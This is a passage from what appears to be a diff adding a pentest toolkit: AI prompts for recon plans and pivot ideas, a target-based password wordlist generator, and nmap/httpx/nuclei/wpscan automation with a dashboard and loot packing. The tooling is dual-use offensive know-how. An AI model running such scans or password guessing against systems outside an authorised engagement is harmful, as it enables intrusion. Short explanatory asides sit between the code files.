prompt = f"Goal:\n{goal}\n\nContext:\n{ctx}\n\nConstraints: Use available wrappers (nmap_*, httpx_probe.sh, nuclei_quick.sh, dirbuster.sh, etc.). Output a ready-to-run bash command list."
print(ai_complete(prompt, system=system).strip())

bin/ai/orchestrate_web.py Executable file

@@ -0,0 +1,38 @@
#!/usr/bin/env python3
import os, sys, json, subprocess, tempfile
from _ai_utils import ai_complete
HELP = """Usage: orchestrate_web.py <hosts.txt>
Reads hosts, probes with httpx (if present), proposes recon plan via AI, and emits suggested commands.
Env: OPENAI_API_KEY or OLLAMA_HOST; models via OPENAI_MODEL/OLLAMA_MODEL.
"""
def run(cmd):
try:
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT, timeout=120)
return out.decode(errors='ignore')
except Exception as e:
return ''
if len(sys.argv) < 2:
print(HELP, file=sys.stderr); sys.exit(1)
hosts_file = sys.argv[1]
if not os.path.isfile(hosts_file):
print('[!] hosts file missing', file=sys.stderr); sys.exit(2)
httpx_out = ''
urls_file = None
import shutil
if shutil.which('httpx'):
httpx_out = run(['httpx','-silent','-l',hosts_file,'-ports','80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000','-status-code','-title','-tech-detect','-asn','-ip','-hash','-server'])
tf = tempfile.NamedTemporaryFile(delete=False, mode='w'); urls_file = tf.name
for line in httpx_out.splitlines():
parts = line.split(' ')
if parts:
tf.write(parts[0]+'\n')
tf.close()
context = f"HTTPX OUTPUT:\n{httpx_out}\n\nInstructions: Generate a prioritized web recon plan with concrete commands using provided toolkit scripts (bin/... wrappers). Keep it concise, bash-ready, and safe."
plan = ai_complete(context, system='You are a seasoned web pentest copilot.') or 'httpx not available; run web_recon.sh <host> manually.'
print(plan.strip())

bin/ai/review_findings.py Executable file

@@ -0,0 +1,16 @@
#!/usr/bin/env python3
import os, sys
from _ai_utils import ai_complete
def usage():
print(f"Usage: {sys.argv[0]} <notes.md|textfile> [extra context file]", file=sys.stderr)
sys.exit(1)
if len(sys.argv) < 2:
usage()
text = open(sys.argv[1],'r',errors='ignore').read()
ctx = open(sys.argv[2],'r',errors='ignore').read() if len(sys.argv)>2 else ''
prompt = f"Notes:\n{text}\n\nExtra:\n{ctx}\n\nSummarize key findings (bullets), list exploitable vectors, immediate next steps, and any cred reuse or pivot ideas."
print(ai_complete(prompt, system='You extract key findings, risks, and next actions for a pentest.').strip())

bin/ai/wordlist_from_context.py Executable file

@@ -0,0 +1,91 @@
#!/usr/bin/env python3
import os, sys, re, unicodedata
try:
import requests, json
except Exception:
requests = None
def normalize_words(text):
text = unicodedata.normalize('NFKC', text)
words = re.findall(r"[A-Za-z][A-Za-z0-9_\-]{2,}", text)
return sorted(set(w.strip("-_").lower() for w in words))
def mutate(words):
years = ['2020','2021','2022','2023','2024','2025']
suffixes = ['', '!', '@', '#', '1', '123', '321']
leet = str.maketrans({'a':'@','A':'@','e':'3','E':'3','i':'1','I':'1','o':'0','O':'0','s':'$','S':'$'})
out = set()
for w in words:
base = [w, w.capitalize(), w.upper()]
for b in base:
out.add(b)
out.add(b.translate(leet))
for y in years:
out.add(b + y)
out.add(b.translate(leet) + y)
for s in suffixes:
out.add(b + s)
return sorted(out)
def ask_ai(prompt, model=None):
provider = os.environ.get('PROVIDER')
if not provider:
provider = 'openai' if os.environ.get('OPENAI_API_KEY') else 'ollama'
if provider == 'openai' and os.environ.get('OPENAI_API_KEY'):
if requests is None:
return None
key = os.environ['OPENAI_API_KEY']
model = model or os.environ.get('OPENAI_MODEL', 'gpt-4o-mini')
url = 'https://api.openai.com/v1/chat/completions'
headers = {'Authorization': f'Bearer {key}', 'Content-Type': 'application/json'}
body = {'model': model, 'messages': [{'role':'system','content':'Generate a focused password wordlist.'},{'role':'user','content':prompt}], 'temperature':0.2}
r = requests.post(url, headers=headers, data=json.dumps(body), timeout=60)
if r.ok:
return r.json()['choices'][0]['message']['content']
return None
# ollama if available
if requests is None:
return None
host = os.environ.get('OLLAMA_HOST', 'http://localhost:11434')
model = model or os.environ.get('OLLAMA_MODEL', 'llama3.1')
url = f'{host}/api/chat'
body = {'model': model, 'messages': [{'role': 'system', 'content': 'Generate a focused password wordlist.'}, {'role': 'user', 'content': prompt}]}
r = requests.post(url, json=body, timeout=60)
if r.ok:
try:
return r.json()['message']['content']
except Exception:
return r.text
return None
def usage():
print(f"Usage: {sys.argv[0]} <domain-or-target> [context-file|-]", file=sys.stderr)
sys.exit(1)
if len(sys.argv) < 2:
usage()
target = sys.argv[1]
ctx = ''
if len(sys.argv) > 2:
arg = sys.argv[2]
if arg == '-':
ctx = sys.stdin.read()
elif os.path.isfile(arg):
ctx = open(arg, 'r', errors='ignore').read()
words = normalize_words(target + ' ' + ctx)
base = mutate(words)
ai = ask_ai(f"Target: {target}\nContext:\n{ctx}\nOutput a newline-delimited list of likely passwords and tokens. Avoid commentary.")
if ai:
# extract lines that look like words
lines = [l.strip() for l in ai.splitlines()]
ai_words = [l for l in lines if l and not l.startswith('#') and len(l) <= 64]
else:
ai_words = []
final = sorted(set(base + ai_words))
for w in final:
print(w)
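The tokenizer's behavior is easy to sanity-check; the same normalize_words logic, standalone:

```python
import re, unicodedata

def normalize_words(text):
    # NFKC-normalize, keep identifier-like words of 3+ chars,
    # strip edge punctuation, lowercase, dedupe
    text = unicodedata.normalize('NFKC', text)
    words = re.findall(r"[A-Za-z][A-Za-z0-9_\-]{2,}", text)
    return sorted(set(w.strip("-_").lower() for w in words))
```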

bin/automation/auto_recon.sh Executable file

@@ -0,0 +1,66 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <target> [--no-udp]
Runs quick nmap, parses ports, kicks off full/udp, and basic web enum.
USAGE
exit 1
}
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && usage
shift || true
do_udp=1
while [[ $# -gt 0 ]]; do
case "$1" in
--no-udp) do_udp=0; shift;;
*) shift; break;;
esac
done
outdir=${OUTDIR:-targets/${target}/scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
log="$outdir/auto_recon_${ts}.log"
summary="$outdir/auto_recon_${ts}.summary.txt"
echo "[+] Starting quick scan" | tee -a "$log"
qbase="$outdir/${target}_quick_${ts}"
nmap -Pn -T4 -sC -sV -oA "$qbase" "$target" | tee -a "$log"
gnmap="$qbase.gnmap"
ports=$(bin/automation/parse_nmap_open_ports.sh "$gnmap" || true)
echo "[+] Open TCP ports: ${ports:-none}" | tee -a "$log" "$summary"
if [[ -n "${ports:-}" ]]; then
# Guess HTTP(S) ports and probe scheme
http_ports=(80 81 88 443 3000 5000 8000 8008 8080 8081 8443 8888 9000)
for p in ${ports//,/ }; do
for hp in "${http_ports[@]}"; do
if [[ "$p" == "$hp" ]]; then
for scheme in http https; do
code=$(curl -sk -o /dev/null -m 4 -w "%{http_code}" "$scheme://$target:$p/" || true)
if [[ "$code" != "000" ]]; then
echo "[+] Web detected: $scheme://$target:$p/ (code=$code)" | tee -a "$log" "$summary"
bin/web/dirbuster.sh "$scheme://$target:$p/" || true
break
fi
done
fi
done
done
fi
echo "[+] Kicking off full TCP (-p-) and targeted sC+sV" | tee -a "$log"
bin/nmap_full.sh "$target" --rate 5000 | tee -a "$log" || true
if [[ $do_udp -eq 1 ]]; then
echo "[+] Kicking off UDP top 200" | tee -a "$log"
bin/nmap_udp.sh "$target" --top 200 | tee -a "$log" || true
fi
echo "[+] Auto recon done. Summary: $summary" | tee -a "$log"

bin/automation/cleanup_scans.sh Executable file

@@ -0,0 +1,12 @@
#!/usr/bin/env bash
set -euo pipefail
dir=${1:-${OUTDIR:-scans}}
days=${2:-7}
force=${3:-}
[[ ! -d "$dir" ]] && { echo "Usage: $(basename "$0") [dir] [days] [--force]" >&2; exit 1; }
echo "[+] Pruning files older than $days days in $dir"
[[ "${force:-}" != "--force" ]] && { read -r -p "Proceed? [y/N] " ans; [[ "$ans" == "y" || "$ans" == "Y" ]] || exit 0; }
find "$dir" -type f -mtime +"$days" -print -delete
echo "[+] Done"

bin/automation/dashboard.py Executable file

@@ -0,0 +1,164 @@
#!/usr/bin/env python3
import os, json, sys, glob, datetime
def load_manifest(path):
try:
with open(path,'r') as f:
return json.load(f)
except Exception:
return None
def status_symbol(s, color=True):
sym = {'ok':'OK','running':'..','fail':'XX'}.get(s, '--')
if not color or not sys.stdout.isatty():
return sym
colors = {'ok':'\033[32m','running':'\033[33m','fail':'\033[31m'}
reset='\033[0m'
return f"{colors.get(s,'')}{sym}{reset}"
def sev_bar(sev_map, total, width=20, color=True):
    if not total:
        return '-'*width
    order=['critical','high','medium','low']
    codes={'critical':'\033[41m','high':'\033[45m','medium':'\033[43m','low':'\033[42m'}
    bar=''
    filled=0
    for k in order:
        n=int((sev_map.get(k,0)/total)*width)
        if n>0:
            seg='█'*n
            if color and sys.stdout.isatty():
                bar+=codes.get(k,'')+seg+'\033[0m'
            else:
                bar+=seg
            filled+=n
    if filled<width:
        bar+=' '*(width-filled)
    return bar
color = True
compact = False
fancy = True
if '--no-color' in sys.argv:
color = False
if '--compact' in sys.argv:
compact = True
if '--no-fancy' in sys.argv:
fancy = False
if '--fancy' in sys.argv:
fancy = True
root = os.environ.get('HTB_ROOT', os.getcwd())
targets_dir = os.path.join(root,'targets')
manifests = glob.glob(os.path.join(targets_dir,'*','manifest.json'))
rows=[]
# Aggregates for badges/header
agg = {
'targets': 0,
'completed': 0,
'pending': 0,
'sev': {'critical':0,'high':0,'medium':0,'low':0}
}
for m in manifests:
target=os.path.basename(os.path.dirname(m))
data=load_manifest(m) or {}
created=data.get('created_at','')
last=data.get('last_pipeline','')
urls=len(data.get('urls',[])) if isinstance(data.get('urls'), list) else 0
tasks=data.get('tasks',{})
agg['targets'] += 1
# Summaries
sev_str=''
tech_str=''
httpx_meta=(tasks.get('httpx') or {}).get('meta') or {}
nuclei_meta=(tasks.get('nuclei') or {}).get('meta') or {}
try:
if 'httpx_summary' in httpx_meta and os.path.isfile(httpx_meta['httpx_summary']):
with open(httpx_meta['httpx_summary'],'r') as f:
s=json.load(f)
tech=s.get('tech') or {}
top=sorted(tech.items(), key=lambda x: x[1], reverse=True)[:3]
tech_str=', '.join(f"{k}:{v}" for k,v in top)
except Exception:
pass
sev_map={}
sev_total=0
try:
if 'nuclei_summary' in nuclei_meta and os.path.isfile(nuclei_meta['nuclei_summary']):
with open(nuclei_meta['nuclei_summary'],'r') as f:
s=json.load(f)
sev=(s.get('by_severity') or {})
sev_map={k:int(sev[k]) for k in sev}; sev_total=int(s.get('total',0) or 0)
sev_str=' '.join(f"{k[0]}:{sev_map.get(k,0)}" for k in ['critical','high','medium','low'] if sev_map.get(k))
for k in ['critical','high','medium','low']:
agg['sev'][k] += int(sev_map.get(k,0))
except Exception:
pass
# Durations
def dur(task):
t=tasks.get(task) or {}
meta=t.get('meta') or {}
if 'elapsed_sec' in meta:
return str(meta['elapsed_sec'])
# fallback compute
try:
a=t.get('started_at'); b=t.get('finished_at')
if a and b:
da=datetime.datetime.strptime(a,'%Y-%m-%d %H:%M:%S')
db=datetime.datetime.strptime(b,'%Y-%m-%d %H:%M:%S')
return str(int((db-da).total_seconds()))
except Exception:
pass
return '-'
row=[target, created, last, str(urls),
status_symbol(tasks.get('dns',{}).get('status'), color=color)+'('+dur('dns')+'s)',
status_symbol(tasks.get('httpx',{}).get('status'), color=color)+'('+dur('httpx')+'s)',
status_symbol(tasks.get('nuclei',{}).get('status'), color=color)+'('+dur('nuclei')+'s)',
status_symbol(tasks.get('techroute',{}).get('status'), color=color)+'('+dur('techroute')+'s)',
status_symbol(tasks.get('wpscan',{}).get('status'), color=color)+'('+dur('wpscan')+'s)',
sev_str or '-', tech_str or '-', sev_bar(sev_map, sev_total, color=color)]
rows.append(row)
fp = (tasks.get('full_pipeline') or {}).get('status')
if fp == 'ok':
agg['completed'] += 1
else:
agg['pending'] += 1
if '--json' in sys.argv:
out=[]
for r in rows:
out.append({'target':r[0],'created_at':r[1],'last_pipeline':r[2],'urls':int(r[3]),'tasks':{'dns':r[4],'httpx':r[5],'nuclei':r[6],'techroute':r[7],'wpscan':r[8]}})
print(json.dumps(out, indent=2))
sys.exit(0)
def print_header():
    if not fancy or compact or not sys.stdout.isatty():
        return
    # Build an ASCII header box sized to the longer of the two lines
    t = agg['targets']; c = agg['completed']; p = agg['pending']
    s = agg['sev']
    title = f" Pentest Dashboard — targets:{t} completed:{c} pending:{p} "
    sev_line = f" severities — C:{s['critical']} H:{s['high']} M:{s['medium']} L:{s['low']} "
    width = max(len(title), len(sev_line))
    line = '+' + '-'*width + '+'
    print(line)
    print('|' + title.ljust(width) + '|')
    print('|' + sev_line.ljust(width) + '|')
    print(line)
if compact:
    headers=['target','urls','dns','httpx','nuclei','tech','wp','sev','bar']
    print_header()
    print(' | '.join(headers))
    print('-' * 72)
    for r in sorted(rows, key=lambda x: x[0]):
        # r indices: 0 tgt, 3 urls, 4 dns, 5 httpx, 6 nuclei, 7 tech, 8 wp, 9 sev, 11 bar
        out=[r[0], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[11]]
        print(' | '.join(out))
else:
    headers=['target','created','last','urls','dns','httpx','nuclei','tech','wp','sev','top-techs','bar']
    print_header()
    print(' | '.join(headers))
    print('-' * 72)
    for r in sorted(rows, key=lambda x: x[0]):
        print(' | '.join(r))
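The dur() fallback above derives elapsed seconds from the manifest's started_at/finished_at timestamps. In isolation (timestamp values invented for illustration):

```python
import datetime

# Same timestamp format manifest.py writes: '%Y-%m-%d %H:%M:%S'
fmt = '%Y-%m-%d %H:%M:%S'
a = datetime.datetime.strptime('2025-10-08 16:00:00', fmt)
b = datetime.datetime.strptime('2025-10-08 16:02:30', fmt)
elapsed = int((b - a).total_seconds())  # 150
```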

bin/automation/full_pipeline.sh Executable file
@@ -0,0 +1,192 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <domain|hosts.txt> [--unsafe] [--resume] [--force]
Pipeline: DNS subenum (if domain) -> httpx (balanced) -> nuclei (auto sev) -> tech route (nuclei by tech) -> optional wpscan.
Outputs to OUTDIR and updates manifest for TARGET (settarget recommended). With --resume (default), completed steps are skipped based on manifest.
USAGE
exit 1
}
in=${1:-}
[[ -z "$in" ]] && usage
unsafe=0
resume=1
for a in "$@"; do
  case "$a" in
    --unsafe) unsafe=1;;
    --resume) resume=1;;
    --force) resume=0;;
  esac
done
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
hosts_file="$in"
domain=""
if [[ ! -f "$in" ]]; then
domain="$in"
hosts_file="$outdir/subs_${domain}_${ts}.txt"
if [[ $resume -eq 1 && -n "${TARGET:-}" ]]; then
if bin/automation/manifest.py taskstatus "$TARGET" dns >/dev/null 2>&1; then
echo "[=] Resume: skipping DNS (already ok)"
else
echo "[+] DNS: subenum.sh $domain"
bin/automation/manifest.py task "$TARGET" dns start
_t0=$(date +%s)
if command -v subenum.sh >/dev/null 2>&1; then
subenum.sh "$domain" | tee "$hosts_file"
else
bin/dns/subenum.sh "$domain" | tee "$hosts_file"
fi
_t1=$(date +%s); _dt=$((_t1-_t0))
bin/automation/manifest.py task "$TARGET" dns ok "{\"subs_file\": \"$hosts_file\", \"elapsed_sec\": $_dt}"
fi
else
echo "[+] DNS: subenum.sh $domain"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" dns start
_t0=$(date +%s)
if command -v subenum.sh >/dev/null 2>&1; then
subenum.sh "$domain" | tee "$hosts_file"
else
bin/dns/subenum.sh "$domain" | tee "$hosts_file"
fi
_t1=$(date +%s); _dt=$((_t1-_t0))
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" dns ok "{\"subs_file\": \"$hosts_file\", \"elapsed_sec\": $_dt}"
fi
fi
if [[ $resume -eq 1 && -n "${TARGET:-}" ]]; then
# Run the status check inside the 'if' so a non-zero exit does not trip set -e
if bin/automation/manifest.py taskstatus "$TARGET" httpx >/dev/null 2>&1; then
echo "[=] Resume: skipping HTTPX (already ok)"
else
echo "[+] HTTPX balanced probe"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" httpx start
_t0=$(date +%s)
bin/web/httpx_presets.sh balanced "$hosts_file" | tee "$outdir/httpx_${ts}.txt"
cut -d ' ' -f1 "$outdir/httpx_${ts}.txt" | sort -u > "$outdir/urls_${ts}.txt"
# JSON evidence for richer dashboard (resume)
httpx -silent -l "$hosts_file" -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -tech-detect -json > "$outdir/httpx_${ts}.json"
python3 - "$outdir/httpx_${ts}.json" > "$outdir/httpx_${ts}.summary.json" <<'PY'
import sys, json, collections
tech=collections.Counter(); urls=0
with open(sys.argv[1],'r',errors='ignore') as f:
for line in f:
try:
o=json.loads(line); urls+=1
for t in o.get('technologies',[]) or []:
tech[t.lower()]+=1
except Exception: pass
print(json.dumps({'urls': urls, 'tech': dict(tech)}, indent=2))
PY
urls_count=$(wc -l < "$outdir/urls_${ts}.txt" | tr -d ' ')
_t1=$(date +%s); _dt=$((_t1-_t0))
bin/automation/manifest.py task "$TARGET" httpx ok "{\"urls\": $urls_count, \"urls_file\": \"$outdir/urls_${ts}.txt\", \"httpx_json\": \"$outdir/httpx_${ts}.json\", \"httpx_summary\": \"$outdir/httpx_${ts}.summary.json\", \"elapsed_sec\": $_dt}"
fi
else
echo "[+] HTTPX balanced probe"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" httpx start
_t0=$(date +%s)
bin/web/httpx_presets.sh balanced "$hosts_file" | tee "$outdir/httpx_${ts}.txt"
cut -d ' ' -f1 "$outdir/httpx_${ts}.txt" | sort -u > "$outdir/urls_${ts}.txt"
# JSON evidence for richer dashboard
httpx -silent -l "$hosts_file" -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -tech-detect -json > "$outdir/httpx_${ts}.json"
# Summarize tech counts
python3 - "$outdir/httpx_${ts}.json" > "$outdir/httpx_${ts}.summary.json" <<'PY'
import sys, json, collections
tech=collections.Counter(); urls=0
with open(sys.argv[1],'r',errors='ignore') as f:
for line in f:
try:
o=json.loads(line); urls+=1
for t in o.get('technologies',[]) or []:
tech[t.lower()]+=1
except Exception: pass
print(json.dumps({'urls': urls, 'tech': dict(tech)}, indent=2))
PY
_t1=$(date +%s); _dt=$((_t1-_t0))
[[ -n "${TARGET:-}" ]] && { urls_count=$(wc -l < "$outdir/urls_${ts}.txt" | tr -d ' '); bin/automation/manifest.py task "$TARGET" httpx ok "{\"urls\": $urls_count, \"urls_file\": \"$outdir/urls_${ts}.txt\", \"httpx_json\": \"$outdir/httpx_${ts}.json\", \"httpx_summary\": \"$outdir/httpx_${ts}.summary.json\", \"elapsed_sec\": $_dt}"; }
fi
if [[ $resume -eq 1 && -n "${TARGET:-}" ]]; then
if bin/automation/manifest.py taskstatus "$TARGET" nuclei >/dev/null 2>&1; then
echo "[=] Resume: skipping nuclei (already ok)"
else
echo "[+] Nuclei (auto severity)"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" nuclei start
_t0=$(date +%s)
bin/web/httpx_to_nuclei.sh "$outdir/urls_${ts}.txt" | tee "$outdir/nuclei_pipeline_${ts}.log"
nucjson=$(grep -oE 'NUCLEI_JSON: .*' "$outdir/nuclei_pipeline_${ts}.log" | sed 's/NUCLEI_JSON: //')
nucsum=$(grep -oE 'NUCLEI_SUMMARY: .*' "$outdir/nuclei_pipeline_${ts}.log" | sed 's/NUCLEI_SUMMARY: //')
_t1=$(date +%s); _dt=$((_t1-_t0))
if [[ -n "$nucjson" ]]; then
bin/automation/manifest.py task "$TARGET" nuclei ok "{\"log\": \"$outdir/nuclei_pipeline_${ts}.log\", \"nuclei_json\": \"$nucjson\", \"nuclei_summary\": \"$nucsum\", \"elapsed_sec\": $_dt}"
else
bin/automation/manifest.py task "$TARGET" nuclei ok "{\"log\": \"$outdir/nuclei_pipeline_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
fi
else
echo "[+] Nuclei (auto severity)"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" nuclei start
_t0=$(date +%s)
bin/web/httpx_to_nuclei.sh "$outdir/urls_${ts}.txt" | tee "$outdir/nuclei_pipeline_${ts}.log"
# Capture JSON and counts if produced
nucjson=$(grep -oE 'NUCLEI_JSON: .*' "$outdir/nuclei_pipeline_${ts}.log" | sed 's/NUCLEI_JSON: //')
nucsum=$(grep -oE 'NUCLEI_SUMMARY: .*' "$outdir/nuclei_pipeline_${ts}.log" | sed 's/NUCLEI_SUMMARY: //')
if [[ -n "${TARGET:-}" ]]; then
_t1=$(date +%s); _dt=$((_t1-_t0))
if [[ -n "$nucjson" ]]; then
bin/automation/manifest.py task "$TARGET" nuclei ok "{\"log\": \"$outdir/nuclei_pipeline_${ts}.log\", \"nuclei_json\": \"$nucjson\", \"nuclei_summary\": \"$nucsum\", \"elapsed_sec\": $_dt}"
else
bin/automation/manifest.py task "$TARGET" nuclei ok "{\"log\": \"$outdir/nuclei_pipeline_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
fi
fi
if [[ $resume -eq 1 && -n "${TARGET:-}" ]]; then
if bin/automation/manifest.py taskstatus "$TARGET" techroute >/dev/null 2>&1; then
echo "[=] Resume: skipping tech route (already ok)"
else
echo "[+] Tech route"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" techroute start
_t0=$(date +%s)
bin/web/httpx_tech_route.py "$outdir/urls_${ts}.txt" | tee "$outdir/tech_route_${ts}.log"
_t1=$(date +%s); _dt=$((_t1-_t0))
bin/automation/manifest.py task "$TARGET" techroute ok "{\"log\": \"$outdir/tech_route_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
else
echo "[+] Tech route"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" techroute start
_t0=$(date +%s)
bin/web/httpx_tech_route.py "$outdir/urls_${ts}.txt" | tee "$outdir/tech_route_${ts}.log"
_t1=$(date +%s); _dt=$((_t1-_t0))
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" techroute ok "{\"log\": \"$outdir/tech_route_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
if [[ -f "$outdir/httpx_${ts}.txt" ]] && grep -qi wordpress "$outdir/httpx_${ts}.txt" && command -v wpscan >/dev/null 2>&1; then
echo "[+] WordPress detected; running wpscan_quick on first few URLs"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" wpscan start
_t0=$(date +%s)
head -n 5 "$outdir/urls_${ts}.txt" | while read -r u; do
if echo "$u" | grep -qi 'http'; then bin/web/wpscan_quick.sh "$u" | tee -a "$outdir/wpscan_${ts}.log"; fi
done
_t1=$(date +%s); _dt=$((_t1-_t0))
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" wpscan ok "{\"log\": \"$outdir/wpscan_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
if [[ -n "$domain" && -n "${TARGET:-}" ]]; then
# Update manifest for this target
bin/automation/manifest.py init "$TARGET" >/dev/null || true
bin/automation/manifest.py addlist "$TARGET" urls "$outdir/urls_${ts}.txt"
bin/automation/manifest.py set "$TARGET" last_pipeline "$ts"
fi
echo "[+] Full pipeline complete. OUTDIR=$outdir"
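The resume checks in this pipeline hinge on the manifest.py taskstatus exit codes (0 = ok, 2 = running, 1 = anything else). A minimal sketch of that mapping, mirroring the logic in manifest.py rather than importing it:

```python
def status_to_exit(status):
    # Mirrors manifest.py taskstatus: 0 = ok, 2 = running, 1 = anything else
    if status == 'ok':
        return 0
    if status == 'running':
        return 2
    return 1

# A resume wrapper skips a step exactly when the mapped code is 0
skip_dns = status_to_exit('ok') == 0
```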

bin/automation/loot_pack.sh Executable file
@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
dir=${1:-${PWD}}
[[ ! -d "$dir" ]] && { echo "Usage: $(basename "$0") [dir]" >&2; exit 1; }
ts=$(date +%Y%m%d_%H%M%S)
name="loot_${ts}.tar.gz"
tar --exclude='*.pcap' --exclude='node_modules' -czf "$name" -C "$dir" .
echo "[+] Packed $dir into $name"

bin/automation/manifest.py Executable file
@@ -0,0 +1,121 @@
#!/usr/bin/env python3
import os, sys, json, time
HELP = """Usage: manifest.py <command> <target> [args]
Commands:
init <target> Initialize manifest for target
set <target> <key> <value> Set a string value
addlist <target> <key> <file|items> Append items (comma/list/file) to a list key
show <target> Print manifest JSON
task <target> <name> start|ok|fail [meta-json]
get <target> <key> Print key if exists
taskstatus <target> <name> Print status; exit 0 if ok, 2 if running, 1 otherwise
taskreset <target> <name> Reset/remove a task entry
Manifest path: HTB_ROOT/targets/<target>/manifest.json
"""
def mpath(root, target):
return os.path.join(root, 'targets', target, 'manifest.json')
def load(path):
if os.path.isfile(path):
with open(path,'r') as f: return json.load(f)
return {}
def save(path, data):
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path,'w') as f: json.dump(data, f, indent=2)
def as_list(arg):
if os.path.isfile(arg):
with open(arg,'r',errors='ignore') as f:
return [l.strip() for l in f if l.strip()]
if ',' in arg:
return [x.strip() for x in arg.split(',') if x.strip()]
return [arg]
def main():
if len(sys.argv) < 3:
print(HELP); sys.exit(1)
cmd = sys.argv[1]
target = sys.argv[2]
root = os.environ.get('HTB_ROOT', os.getcwd())
path = mpath(root, target)
data = load(path)
if cmd == 'init':
if not data:
data = {'target': target, 'created_at': time.strftime('%Y-%m-%d %H:%M:%S'), 'scans': {}, 'urls': [], 'tech': {}, 'notes': [], 'loot': [], 'tasks': {}}
save(path, data)
print(path)
elif cmd == 'set' and len(sys.argv) >= 5:
key, value = sys.argv[3], sys.argv[4]
data[key] = value
save(path, data)
elif cmd == 'addlist' and len(sys.argv) >= 5:
key, items = sys.argv[3], as_list(sys.argv[4])
if key not in data or not isinstance(data.get(key), list): data[key] = []
for i in items:
if i not in data[key]: data[key].append(i)
save(path, data)
elif cmd == 'show':
print(json.dumps(data, indent=2))
elif cmd == 'get' and len(sys.argv) >= 4:
key = sys.argv[3]
if key in data:
val = data[key]
if isinstance(val, (dict, list)):
print(json.dumps(val, indent=2))
else:
print(val)
sys.exit(0)
else:
sys.exit(1)
elif cmd == 'task' and len(sys.argv) >= 5:
name = sys.argv[3]
action = sys.argv[4]
meta = {}
if len(sys.argv) >= 6:
try:
meta = json.loads(sys.argv[5])
except Exception:
meta = {'raw': sys.argv[5]}
tasks = data.setdefault('tasks', {})
t = tasks.setdefault(name, {})
now = time.strftime('%Y-%m-%d %H:%M:%S')
if action == 'start':
t['status'] = 'running'
t['started_at'] = now
elif action == 'ok':
t['status'] = 'ok'
t['finished_at'] = now
elif action == 'fail':
t['status'] = 'fail'
t['finished_at'] = now
if meta:
t['meta'] = {**t.get('meta', {}), **meta}
tasks[name] = t
data['tasks'] = tasks
save(path, data)
print(json.dumps(t, indent=2))
elif cmd == 'taskstatus' and len(sys.argv) >= 4:
name = sys.argv[3]
status = data.get('tasks', {}).get(name, {}).get('status')
print(status or 'none')
if status == 'ok':
sys.exit(0)
elif status == 'running':
sys.exit(2)
else:
sys.exit(1)
elif cmd == 'taskreset' and len(sys.argv) >= 4:
name = sys.argv[3]
if 'tasks' in data and name in data['tasks']:
del data['tasks'][name]
save(path, data)
print('reset')
else:
print(HELP); sys.exit(1)
if __name__ == '__main__':
main()
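The task subcommand's state transitions and meta merging can be exercised standalone. This is a sketch replicating the logic above (not an import of manifest.py):

```python
import time

def task_update(data, name, action, meta=None):
    # Replicates manifest.py 'task': set status/timestamps, merge meta dicts
    t = data.setdefault('tasks', {}).setdefault(name, {})
    now = time.strftime('%Y-%m-%d %H:%M:%S')
    if action == 'start':
        t['status'] = 'running'
        t['started_at'] = now
    elif action in ('ok', 'fail'):
        t['status'] = action
        t['finished_at'] = now
    if meta:
        t['meta'] = {**t.get('meta', {}), **meta}
    return data

d = task_update({}, 'dns', 'start')
d = task_update(d, 'dns', 'ok', {'elapsed_sec': 3})
```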

bin/automation/notes_attach.sh Executable file
@@ -0,0 +1,25 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> (or set TARGET)" >&2; exit 1; }
root=${HTB_ROOT:-$PWD}
dir="$root/targets/$target"
notes="$dir/notes.md"
scandir="$dir/scans"
[[ -f "$notes" ]] || { echo "[!] $notes not found. Run notes_init.sh first." >&2; exit 1; }
{
printf '\n## Artifacts Summary (%s)\n' "$(date '+%F %T')"
if [[ -d "$scandir" ]]; then
printf '\n### Scans\n'
find "$scandir" -maxdepth 1 -type f -printf "- %f\n" 2>/dev/null || ls -1 "$scandir" | sed 's/^/- /'
else
echo "- No scans directory found"
fi
} >> "$notes"
echo "[+] Appended artifacts summary to $notes"

bin/automation/notes_init.sh Executable file
@@ -0,0 +1,58 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> (or set TARGET)" >&2; exit 1; }
root=${HTB_ROOT:-$PWD}
dir="$root/targets/$target"
mkdir -p "$dir/scans" "$dir/loot" "$dir/www" "$dir/exploits"
notes="$dir/notes.md"
if [[ -f "$notes" ]]; then
echo "[!] $notes exists. Not overwriting." >&2
exit 1
fi
cat > "$notes" <<'MD'
# Engagement Notes
- Target: TARGET_PLACEHOLDER
- Date: DATE_PLACEHOLDER
## Scope / Access
- VPN:
- Auth:
## Recon Summary
- Hosts:
- Open Ports:
- Services:
